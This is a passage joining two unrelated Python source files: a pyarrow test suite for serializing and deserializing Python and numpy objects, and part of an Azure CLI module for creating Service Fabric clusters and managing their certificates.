.format(obj1, obj2))
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 999,
[1 << 100, [1 << 100]], "a", string.printable, "\u262F",
"hello world", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
None, True, False, [], (), {}, {(1, 2): 1}, {(): 2},
[1, "hello", 3.0], u"\u262F", 42.0, (1.0, "hi"),
[1, 2, 3, None], [(None,), 3, 1.0], ["h", "e", "l", "l", "o", None],
(None, None), ("hello", None), (True, False),
{True: "hello", False: "world"}, {"hello": "world", 1: 42, 2.5: 45},
{"hello": set([2, 3]), "world": set([42.0]), "this": None},
np.int8(3), np.int32(4), np.int64(5),
np.uint8(3), np.uint32(4), np.uint64(5), np.float16(1.9), np.float32(1.9),
np.float64(1.9), np.zeros([8, 20]),
np.random.normal(size=[17, 10]), np.array(["hi", 3]),
np.array(["hi", 3], dtype=object),
np.random.normal(size=[15, 13]).T,
]
if sys.version_info >= (3, 0):
PRIMITIVE_OBJECTS += [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
PRIMITIVE_OBJECTS += [long(42), long(1 << 62), long(0), # noqa
np.array([["hi", u"hi"],
[1.3, long(1)]])] # noqa
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{"obj{}".format(i): np.random.normal(size=[4, 4]) for i in range(5)},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
((((((((((),),),),),),),),),),
{"a": {"b": {"c": {"d": {}}}}},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(1), Foo(42)]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class SubQuxPickle(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = namedtuple("Point", ["x", "y"])
NamedTupleExample = namedtuple("Example",
"field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [Exception("Test object."), CustomError(), Point(11, y=22),
Foo(), Bar(), Baz(), Qux(), SubQux(), SubQuxPickle(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
OrderedDict([("hello", 1), ("world", 2)])]
def make_serialization_context():
context = pa.default_serialization_context()
context.register_type(Foo, "Foo")
context.register_type(Bar, "Bar")
context.register_type(Baz, "Baz")
context.register_type(Qux, "Quz")
context.register_type(SubQux, "SubQux")
context.register_type(SubQuxPickle, "SubQuxPickle", pickle=True)
context.register_type(Exception, "Exception")
context.register_type(CustomError, "CustomError")
context.register_type(Point, "Point")
context.register_type(NamedTupleExample, "NamedTupleExample")
return context
global_serialization_context = make_serialization_context()
def serialization_roundtrip(value, scratch_buffer,
context=global_serialization_context):
writer = pa.FixedSizeBufferWriter(scratch_buffer)
pa.serialize_to(value, writer, context=context)
reader = pa.BufferReader(scratch_buffer)
result = pa.deserialize_from(reader, None, context=context)
assert_equal(value, result)
_check_component_roundtrip(value, context=context)
def _check_component_roundtrip(value, context=global_serialization_context):
# Test to/from components
serialized = pa.serialize(value, context=context)
components = serialized.to_components()
from_comp = pa.SerializedPyObject.from_components(components)
recons = from_comp.deserialize(context=context)
assert_equal(value, recons)
@pytest.yield_fixture(scope='session')
def large_buffer(size=32*1024*1024):
return pa.allocate_buffer(size)
def large_memory_map(tmpdir_factory, size=100*1024*1024):
path = (tmpdir_factory.mktemp('data')
.join('pyarrow-serialization-tmp-file').strpath)
# Create a large memory mapped file
with open(path, 'wb') as f:
f.write(np.random.randint(0, 256, size=size)
.astype('u1')
.tobytes()
[:size])
return path
def test_clone():
context = pa.SerializationContext()
class Foo(object):
pass
def custom_serializer(obj):
return 0
def custom_deserializer(serialized_obj):
return (serialized_obj, 'a')
context.register_type(Foo, 'Foo', custom_serializer=custom_serializer,
custom_deserializer=custom_deserializer)
new_context = context.clone()
f = Foo()
serialized = pa.serialize(f, context=context)
deserialized = serialized.deserialize(context=context)
assert deserialized == (0, 'a')
serialized = pa.serialize(f, context=new_context)
deserialized = serialized.deserialize(context=new_context)
assert deserialized == (0, 'a')
def test_primitive_serialization(large_buffer):
for obj in PRIMITIVE_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_serialize_to_buffer():
for nthreads in [1, 4]:
for value in COMPLEX_OBJECTS:
buf = pa.serialize(value).to_buffer(nthreads=nthreads)
result = pa.deserialize(buf)
assert_equal(value, result)
def test_complex_serialization(large_buffer):
for obj in COMPLEX_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_custom_serialization(large_buffer):
for obj in CUSTOM_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_default_dict_serialization(large_buffer):
pytest.importorskip("cloudpickle")
obj = defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
serialization_roundtrip(obj, large_buffer)
def test_numpy_serialization(large_buffer):
for t in ["bool", "int8", "uint8", "int16", "uint16", "int32",
"uint32", "float16", "float32", "float64", "<U1", "<U2", "<U3",
"<U4", "|S1", "|S2", "|S3", "|S4", "|O"]:
obj = np.random.randint(0, 10, size=(100, 100)).astype(t)
serialization_roundtrip(obj, large_buffer)
obj = obj[1:99, 10:90]
serialization_roundtrip(obj, large_buffer)
def test_datetime_serialization(large_buffer):
data = [
# Principia Mathematica published
datetime.datetime(year=1687, month=7, day=5),
# Some random date
datetime.datetime(year=1911, month=6, day=3, hour=4,
minute=55, second=44),
# End of WWI
datetime.datetime(year=1918, month=11, day=11),
# Beginning of UNIX time
datetime.datetime(year=1970, month=1, day=1),
# The Berlin wall falls
datetime.datetime(year=1989, month=11, day=9),
# Another random date
datetime.datetime(year=2011, month=6, day=3, hour=4,
minute=0, second=3),
# Another random date
datetime.datetime(year=1970, month=1, day=3, hour=4,
minute=0, second=0)
]
for d in data:
serialization_roundtrip(d, large_buffer)
def test_torch_serialization(large_buffer):
pytest.importorskip("torch")
serialization_context = pa.default_serialization_context()
pa.register_torch_serialization_handlers(serialization_context)
# These are the only types that are supported for the
# PyTorch to NumPy conversion
for t in ["float32", "float64",
"uint8", "int16", "int32", "int64"]:
obj = torch.from_numpy(np.random.randn(1000).astype(t))
serialization_roundtrip(obj, large_buffer,
context=serialization_context)
def test_numpy_immutable(large_buffer):
obj = np.zeros([10])
writer = pa.FixedSizeBufferWriter(large_buffer)
pa.serialize_to(obj, writer, global_serialization_context)
reader = pa.BufferReader(large_buffer)
result = pa.deserialize_from(reader, None, global_serialization_context)
with pytest.raises(ValueError):
result[0] = 1.0
def test_numpy_base_object(tmpdir):
# ARROW-2040: deserialized Numpy array should keep a reference to the
# owner of its memory
path = os.path.join(str(tmpdir), 'zzz.bin')
data = np.arange(12, dtype=np.int32)
with open(path, 'wb') as f:
f.write(pa.serialize(data).to_buffer())
serialized = pa.read_serialized(pa.OSFile(path))
result = serialized.deserialize()
assert_equal(result, data)
serialized = None
assert_equal(result, data)
assert result.base is not None
# see https://issues.apache.org/jira/browse/ARROW-1695
def test_serialization_callback_numpy():
class DummyClass(object):
pass
def serialize_dummy_class(obj):
x = np.zeros(4)
return x
def deserialize_dummy_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(DummyClass, "DummyClass",
custom_serializer=serialize_dummy_class,
custom_deserializer=deserialize_dummy_class)
pa.serialize(DummyClass(), context=context)
def test_numpy_subclass_serialization():
# Check that we can properly serialize subclasses of np.ndarray.
class CustomNDArray(np.ndarray):
def __new__(cls, input_array):
array = np.asarray(input_array).view(cls)
return array
def serializer(obj):
return {'numpy': obj.view(np.ndarray)}
def deserializer(data):
array = data['numpy'].view(CustomNDArray)
return array
context = pa.default_serialization_context()
context.register_type(CustomNDArray, 'CustomNDArray',
custom_serializer=serializer,
custom_deserializer=deserializer)
x = CustomNDArray(np.zeros(3))
serialized = pa.serialize(x, context=context).to_buffer()
new_x = pa.deserialize(serialized, context=context)
assert type(new_x) == CustomNDArray
assert np.alltrue(new_x.view(np.ndarray) == np.zeros(3))
def test_buffer_serialization():
class BufferClass(object):
pass
def serialize_buffer_class(obj):
return pa.py_buffer(b"hello")
def deserialize_buffer_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(
BufferClass, "BufferClass",
custom_serializer=serialize_buffer_class,
custom_deserializer=deserialize_buffer_class)
b = pa.serialize(BufferClass(), context=context).to_buffer()
assert pa.deserialize(b, context=context).to_pybytes() == b"hello"
@pytest.mark.skip(reason="extensive memory requirements")
def test_arrow_limits(self):
def huge_memory_map(temp_dir):
return large_memory_map(temp_dir, 100 * 1024 * 1024 * 1024)
with pa.memory_map(huge_memory_map, mode="r+") as mmap:
# Test that objects that are too large for Arrow throw a Python
# exception. These tests give out of memory errors on Travis and need
# to be run on a machine with lots of RAM.
x = 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * ["s"]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [["1"], 2, 3, [{"s": 4}]]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [{"s": 1}] + 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = np.zeros(2 ** 25)
serialization_roundtrip(x, mmap)
del x
x = [np.zeros(2 ** 18) for _ in range(2 ** 7)]
serialization_roundtrip(x, mmap)
del x
def test_serialization_callback_error():
class TempClass(object):
pass
# Pass a SerializationContext into serialize, but TempClass
# is not registered
serialization_context = pa.SerializationContext()
val = TempClass()
with pytest.raises(pa.SerializationCallbackError) as err:
serialized_object = pa.serialize(val, serialization_context)
assert err.value.example_object == val
serialization_context.register_type(TempClass, 20*b"\x00")
serialized_object = pa.serialize(TempClass(), serialization_context)
deserialization_context = pa.SerializationContext()
# Pass a Serialization Context into deserialize, but TempClass
# is not registered
with pytest.raises(pa.DeserializationCallbackError) as err:
serialized_object.deserialize(deserialization_context)
assert err.value.type_id == 20*b"\x00"
def test_fallback_to_subclasses():
class SubFoo(Foo):
def __init__(self):
Foo.__init__(self)
# should be able to serialize/deserialize an instance
# if a base class has been registered
serialization_context = pa.SerializationContext()
serialization_context.register_type(Foo, "Foo")
subfoo = SubFoo()
# should fallbact to Foo serializer
serialized_object = pa.serialize(subfoo, serialization_context)
reconstructed_object = serialized_object.deserialize(
serialization_context
)
assert type(reconstructed_object) == Foo
class Serializable(object):
pass
def serialize_serializable(obj):
return {"type": type(obj), "data": obj.__dict__}
def deserialize_serializable(obj):
val = obj["type"].__new__(obj["type"])
val.__dict__.update(obj["data"])
return val
class SerializableClass(Serializable):
def __init__(self):
self.value = 3
def test_serialize_subclasses():
# This test shows how subclasses can be handled in an idiomatic way
# by having only a serializer for the base class
# This technique should however be used with care, since pickling
# type(obj) with couldpickle will include the full class definition
# in the serialized representation.
# This means the class definition is part of every instance of the
# object, which in general is not desirable; registering all subclasses
# with register_type will result in faster and more memory
# efficient serialization.
context = pa.default_serialization_context()
context.register_type(
Serializable, "Serializable",
custom_serializer=serialize_serializable,
custom_deserializer=deserialize_serializable)
a = SerializableClass()
serialized = pa.serialize(a, context=context)
deserialized = serialized.deserialize(context=context)
assert type(deserialized).__name__ == SerializableClass.__name__
assert deserialized.value == 3
def test_serialize_to_components_invalid_cases():
buf = pa.py_buffer(b'hello')
components = {
'num_tensors': 0,
'num_buffers': 1,
'data': [buf]
}
with pytest.raises(pa.ArrowException):
pa.deserialize_components(components)
components = {
'num_tensors': 1,
'num_buffers': 0,
'data': [buf, buf]
}
with pytest.raises(pa.ArrowException):
pa.deserialize_components(components)
@pytest.mark.skipif(os.name == 'nt', reason="deserialize_regex not pickleable")
def test_deserialize_in_different_process():
from multiprocessing import Process, Queue
import re
regex = re.compile(r"\d+\.\d*")
serialization_context = pa.SerializationContext()
serialization_context.register_type(type(regex), "Regex", pickle=True)
serialized = pa.serialize(regex, serialization_context)
serialized_bytes = serialized.to_buffer().to_pybytes()
def deserialize_regex(serialized, q):
import pyarrow as pa
q.put(pa.deserialize(serialized))
q = Queue()
p = Process(target=deserialize_regex, args=(serialized_bytes, q))
p.start()
assert q.get().pattern == regex.pattern
p.join()
def test_deserialize_buffer_in_different_process():
import tempfile
import subprocess
f = tempfile.NamedTemporaryFile(delete=False)
b = pa.serialize(pa.py_buffer(b'hello')).to_buffer()
f.write(b.to_pybytes())
f.close()
subprocess_env = test_util.get_modified_env_with_pythonpath()
dir_path = os.path.dirname(os.path.realpath(__file__))
python_file = os.path.join(dir_path, 'deserialize_buffer.py')
subprocess.check_call([sys.executable, python_file, f.name],
env=subprocess_env)
def test_set_pickle():
# Use a custom type to trigger pickling.
class Foo(object):
pass
context = pa.SerializationContext()
context.register_type(Foo, 'Foo', pickle=True)
test_object = Foo()
# Define a custom serializer and deserializer to use in place of pickle.
def dumps1(obj):
return b'custom'
def loads1(serialized_obj):
return serialized_obj + b' serialization 1'
# Test that setting a custom pickler changes the behavior.
context.set_pickle(dumps1, loads1)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 1'
# Define another custom serializer and deserializer.
def dumps2(obj):
return b'custom'
def loads2(serialized_obj):
return serialized_obj + b' serialization 2'
# Test that setting another custom pickler changes the behavior again.
context.set_pickle(dumps2, loads2)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 2'
@pytest.mark.skipif(sys.version_info < (3, 6), reason="need Python 3.6")
def test_path_objects(tmpdir):
# Test compatibility with PEP 519 path-like objects
import pathlib
p = pathlib.Path(tmpdir) / 'zzz.bin'
obj = 1234
pa.serialize_to(obj, p)
res = pa.deserialize_from(p, None)
assert res == obj
def test_tensor_alignment():
# Deserialized numpy arrays should be 64-byte aligned.
x = np.random.normal(size=(10, 20, 30))
y = pa.deserialize(pa.serialize(x).to_buffer())
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i) for i in range(100)]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i * (1,)) for i in range(20)]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i * (5,)) for i in range(1, 8)]
xs = [xs[i][(i + 1) * (slice(1, 3),)] for i in range(len(xs))]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=no-self-use,too-many-arguments,line-too-long
# pylint:disable=too-many-lines
import os
import time
from azure.cli.core.util import CLIError, get_file_json, b64_to_hex
import azure.cli.core.azlogging as azlogging
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
from azure.cli.core.commands import (LongRunningOperation) # pylint:disable=ungrouped-imports
from azure.graphrbac import GraphRbacManagementClient
from azure.keyvault import KeyVaultClient
from OpenSSL import crypto
from azure.mgmt.keyvault.models import (VaultProperties, # pylint:disable=ungrouped-imports
Sku as KeyVaultSku,
AccessPolicyEntry,
Permissions,
CertificatePermissions,
KeyPermissions,
SecretPermissions,
SkuName as KeyVaultSkuName)
from azure.keyvault.models import (CertificateAttributes,
CertificatePolicy,
ActionType,
KeyUsageType,
IssuerParameters,
KeyProperties,
LifetimeAction,
SecretProperties,
X509CertificateProperties,
Trigger,
Action)
from azure.mgmt.servicefabric.models import (ClusterUpdateParameters,
ClientCertificateThumbprint,
ClientCertificateCommonName,
SettingsSectionDescription,
SettingsParameterDescription,
NodeTypeDescription,
EndpointRangeDescription)
from azure.mgmt.network.models import (PublicIPAddress,
Subnet,
SubResource as NetworkSubResource,
InboundNatPool,
Probe,
PublicIPAddressDnsSettings,
LoadBalancer,
FrontendIPConfiguration,
BackendAddressPool,
LoadBalancingRule)
from azure.mgmt.compute.models import (VaultCertificate,
Sku as ComputeSku,
UpgradePolicy,
ImageReference,
ApiEntityReference,
VaultSecretGroup,
VirtualMachineScaleSetOSDisk,
VirtualMachineScaleSetVMProfile,
VirtualMachineScaleSetExtensionProfile,
VirtualMachineScaleSetOSProfile,
VirtualMachineScaleSetStorageProfile,
VirtualMachineScaleSet,
VirtualMachineScaleSetNetworkConfiguration,
VirtualMachineScaleSetIPConfiguration,
VirtualMachineScaleSetNetworkProfile,
SubResource,
UpgradeMode)
from azure.mgmt.storage.models import (StorageAccountCreateParameters)
from ._client_factory import (resource_client_factory,
keyvault_client_factory,
compute_client_factory,
storage_client_factory,
network_client_factory)
logger = azlogging.get_az_logger(__name__)
DEFAULT_ADMIN_USER_NAME = "adminuser"
DEFAULT_SKU = "Standard_D2_V2"
DEFAULT_TIER = "Standard"
DEFAULT_OS = "WindowsServer2016Datacenter"
DEFAULT_CLUSTER_SIZE = 5
DEFAULT_DURABILITY_LEVEL = "Bronze"
DEFAULT_APPLICATION_START_PORT = 20000
DEFAULT_APPLICATION_END_PORT = 30000
DEFAULT_EPHEMERAL_START = 49152
DEFAULT_EPHEMERAL_END = 65534
DEFAULT_CLIENT_CONNECTION_ENDPOINT = 19000
DEFAULT_HTTP_GATEWAY_ENDPOINT = 19080
DEFAULT_TCP_PORT = 19000
DEFAULT_HTTP_PORT = 19080
DEFAULT_FRONTEND_PORT_RANGE_START = 3389
DEFAULT_FRONTEND_PORT_RANGE_END = 4500
DEFAULT_BACKEND_PORT = 3389
SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME = "servicefabricnode"
SERVICE_FABRIC_LINUX_NODE_EXT_NAME = "servicefabriclinuxnode"
SOURCE_VAULT_VALUE = "sourceVaultValue"
CERTIFICATE_THUMBPRINT = "certificateThumbprint"
CERTIFICATE_URL_VALUE = "certificateUrlValue"
SEC_SOURCE_VAULT_VALUE = "secSourceVaultValue"
SEC_CERTIFICATE_THUMBPRINT = "secCertificateThumbprint"
SEC_CERTIFICATE_URL_VALUE = "secCertificateUrlValue"
os_dic = {'WindowsServer2012R2Datacenter': '2012-R2-Datacenter',
'UbuntuServer1604': '16.04-LTS',
'WindowsServer2016DatacenterwithContainers': '2016-Datacenter-with-Containers',
'WindowsServer2016Datacenter': '2016-Datacenter'}
def list_cluster(client, resource_group_name=None):
cluster_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(cluster_list)
# pylint:disable=too-many-locals, too-many-statements, too-many-boolean-expressions, too-many-branches
def new_cluster(client,
resource_group_name,
location,
certificate_subject_name=None,
parameter_file=None,
template_file=None,
cluster_name=None,
vault_resource_group_name=None,
vault_name=None,
certificate_file=None,
certificate_password=None,
certificate_output_folder=None,
secret_identifier=None,
vm_user_name=None,
vm_password=None,
cluster_size=None,
vm_sku=None,
vm_os=None):
if certificate_subject_name is None and certificate_file is None and secret_identifier is None:
raise CLIError(
'\'--certificate-subject-name\', \'--certificate-file\', \'--secret-identifier\', one of them must be specified')
if certificate_output_folder and certificate_file:
raise CLIError(
'\'--certificate-output-folder\' and \'--certificate-file\' can not be specified at same time')
if secret_identifier:
if certificate_output_folder or certificate_file or certificate_output_folder or vault_resource_group_name or certificate_password:
raise CLIError(
'\'--certificate-output-folder\' , \'--certificate-file\', \'certificate_output_folder\', \'vault_resource_group_name\', \'certificate_password\' can not be specified,' +
'when \'--secret-identifier\' is specified')
if parameter_file or template_file:
if parameter_file is None or template_file is None:
raise CLIError('If using customize template to deploy,both \'--parameter-file\' and \'--template-file\' can not be None ' + '\n For example:\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json' +
'\n az sf cluster create --resource-group myRg --location westus --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate_file c:\\test.pfx' + '\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate-output-folder c:\\certoutput')
if cluster_size or vm_sku or vm_user_name:
raise CLIError('\'cluster_size\',\'vm_sku\',\'vm_os\',\'vm_user_name\' can not be specified when using customize template deployment')
else:
if vm_password is None:
raise CLIError('\'--vm-password\' could not be None')
if cluster_size is None:
cluster_size = DEFAULT_CLUSTER_SIZE
if vm_sku is None:
vm_sku = DEFAULT_SKU
if vm_os is None:
vm_os = DEFAULT_OS
if vm_user_name is None:
vm_user_name = DEFAULT_ADMIN_USER_NAME
rg = _get_resource_group_name(resource_group_name)
if rg is None:
_create_resource_group_name(resource_group_name, location)
if vault_name is None:
vault_name = resource_group_name
name = ""
for n in vault_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
if len(name) >= 21:
break
vault_name = name
if vault_resource_group_name is None:
vault_resource_group_name = resource_group_name
if cluster_name is None:
cluster_name = resource_group_name
if certificate_file:
filename, file_extension = os.path.splitext(certificate_file) # pylint: disable=unused-variable
if file_extension is None or file_extension.lower() != '.pfx'.lower():
raise CLIError('\'--certificate_file\' should be a valid pfx file')
import datetime
suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
deployment_name = 'AzurePSDeployment-' + suffix
vault_id = None
certificate_uri = None
cert_thumbprint = None
output_file = None
if parameter_file is None:
vm_os = os_dic[vm_os]
reliability_level = _get_reliability_level(cluster_size)
result = _create_certificate(resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
certificate_uri = result[1]
cert_thumbprint = result[2]
output_file = result[3]
linux = None
if vm_os == '16.04-LTS':
linux = True
template = _modify_template(linux)
parameters = _set_parameters_for_default_template(cluster_location=location,
cluster_name=cluster_name,
admin_password=vm_password,
certificate_thumbprint=cert_thumbprint,
vault_id=vault_id,
certificate_id=certificate_uri,
reliability_level=reliability_level,
admin_name=vm_user_name,
cluster_size=cluster_size,
durability_level=DEFAULT_DURABILITY_LEVEL,
vm_sku=vm_sku,
os_type=vm_os,
linux=linux)
else:
parameters, output_file = _set_parameters_for_customize_template(resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file)
vault_id = parameters[SOURCE_VAULT_VALUE]['value']
certificate_uri = parameters[CERTIFICATE_URL_VALUE]['value']
cert_thumbprint = parameters[CERTIFICATE_THUMBPRINT]['value']
template = get_file_json(template_file)
logger.info("Validating the deployment")
validate_result = _deploy_arm_template_core(
resource_group_name, template, parameters, deployment_name, 'incremental', True)
if validate_result.error is not None:
raise CLIError("Template validates error \n'{}'".format(
validate_result.error))
logger.info("Deployment is valid, and begin to deploy")
_deploy_arm_template_core(resource_group_name, template,
parameters, deployment_name, 'incremental', False)
output_dict = {}
output_dict['vm_user_name'] = vm_user_name
output_dict['cluster'] = client.get(resource_group_name, cluster_name)
output_dict['certificate'] = {'certificate_file': output_file,
'vault_id': vault_id,
'certificate_identifier': certificate_uri,
'thumbprint': cert_thumbprint}
return output_dict
def add_app_cert(client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
result = _create_certificate(resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
_add_cert_to_all_vmss(resource_group_name, result[0], result[1])
return client.get(resource_group_name, cluster_name)
def add_client_cert(client,
resource_group_name,
cluster_name,
is_admin=False,
thumbprint=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
admin_client_thumbprints=None,
readonly_client_thumbprints=None,
client_certificate_common_names=None):
if thumbprint:
if certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names:
raise CLIError(
"--thumbprint can only specified alone or with --is-admin")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if admin_client_thumbprints or readonly_client_thumbprints:
if thumbprint or certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--admin-client-thumbprints\' and \'--readonly-client-thumbprints\' can be specified together")
if client_certificate_common_names:
if is_admin or thumbprint or certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints: # pylint: disable=too-many-boolean-expressions
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _add_thumbprint(cluster, is_admin, thumbprint):
remove = []
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove.append(t)
for t in remove:
cluster.client_certificate_thumbprints.remove(t)
cluster.client_certificate_thumbprints.append(
ClientCertificateThumbprint(is_admin, thumbprint))
def _add_common_name(cluster, is_admin, certificate_common_name, certificate_issuer_thumbprint):
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
cluster.client_certificate_common_names.add(ClientCertificateCommonName(
is_admin, certificate_common_name, certificate_issuer_thumbprint))
return cluster.client_certificate_common_names
if thumbprint:
_add_thumbprint(cluster, is_admin, thumbprint)
if admin_client_thumbprints or readonly_client_thumbprints:
if admin_client_thumbprints:
for t in admin_client_thumbprints:
_add_thumbprint(cluster, True, t)
if readonly_client_thumbprints:
for t in readonly_client_thumbprints:
_add_thumbprint(cluster, False, t)
if certificate_common_name:
_add_common_name(cluster, is_admin, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name and 'isAdmin' in common_name:
cluster.client_certificate_common_names = _add_common_name(
cluster, common_name['isAdmin'], common_name['certificateCommonName'], common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_client_cert(client,
resource_group_name,
cluster_name,
thumbprints=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
client_certificate_common_names=None):
if thumbprints:
if certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names:
raise CLIError("--thumbprint can only specified alone")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprints or client_certificate_common_names:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if client_certificate_common_names:
if thumbprints or certificate_common_name or certificate_issuer_thumbprint:
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _remove_thumbprint(cluster, thumbprint):
remove = None
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_thumbprints.remove(remove)
return cluster.client_certificate_thumbprints
def _remove_common_name(cluster, certificate_common_name, certificate_issuer_thumbprint):
remove = None
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
return cluster.certificate_issuer_thumbprint
if isinstance(thumbprints, list) is False:
_remove_thumbprint(cluster, thumbprints)
if isinstance(thumbprints, list) is True:
for t in thumbprints:
cluster.client_certificate_thumbprints = _remove_thumbprint(
cluster, t)
if certificate_common_name:
_remove_common_name(cluster, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name:
cluster.client_certificate_common_names = _remove_common_name(cluster,
common_name['certificateCommonName'],
common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_cert(client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to add certificate")
result = _create_certificate(resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
secret_url = result[1]
thumbprint = result[2]
compute_client = compute_client_factory()
primary_node_type = [
n for n in cluster.node_types if n.is_primary is True][0]
vmss_name = primary_node_type.name
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, vmss_name)
fabric_ext = [ext for ext in vmss.virtual_machine_profile.extension_profile.extensions
